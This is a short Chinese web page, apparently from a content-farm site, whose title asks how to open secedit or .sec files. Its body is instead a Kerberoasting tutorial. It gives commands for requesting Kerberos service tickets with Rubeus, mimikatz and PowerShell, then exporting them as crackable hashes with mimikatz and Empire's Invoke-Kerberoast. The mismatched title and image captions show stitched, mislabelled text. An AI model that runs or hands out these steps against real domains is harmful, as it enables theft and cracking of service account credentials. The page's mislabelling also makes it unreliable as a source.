不能打开secedit文件,sec文件格式怎么打开

首页 > 经验 > 作者:YD1662022-11-04 00:33:53

How to get HASH

如何得到hash?
有如下方法

1.Rubeus.exe

这个工具github上就有,但是clone下来后需要自己编译成exe.

然后执行 Rubeus.exe kerberoast指令即可

不能打开secedit文件,sec文件格式怎么打开(13)

2.mimikatz

mimikatz真的神器。
通过命令 kerberos::ask /target:你所指定的SPN,

即可通过认证的方式得到一个ST。
然后我们在kerberos::list里可以看到我们想要的ST

不能打开secedit文件,sec文件格式怎么打开(14)

3.powershell

越来越发现powershell在域渗透中的重要性了
输入以下指令,即可完成HASH获取

Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MySQL/win7.xie.com:3306/MySQL"

然后mimikatz导出即可

How to export hash

获得了ST票据,但怎么导出?

1.mimikatz

导出所有票据

不能打开secedit文件,sec文件格式怎么打开(15)

可以发现生成了kirbi文件。这就是我们所需要的hash了

2.Empire Powershell 框架

github:https://github.com/EmpireProject/Empire

我们通过这个框架可以导出hashcat格式的hash.

Import-Module .\Invoke-Kerberoast.ps1;Invoke-Kerberoast -outputFormat Hashcat

不能打开secedit文件,sec文件格式怎么打开(16)

上一页12345下一页

栏目热文

文档排行

本站推荐

Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.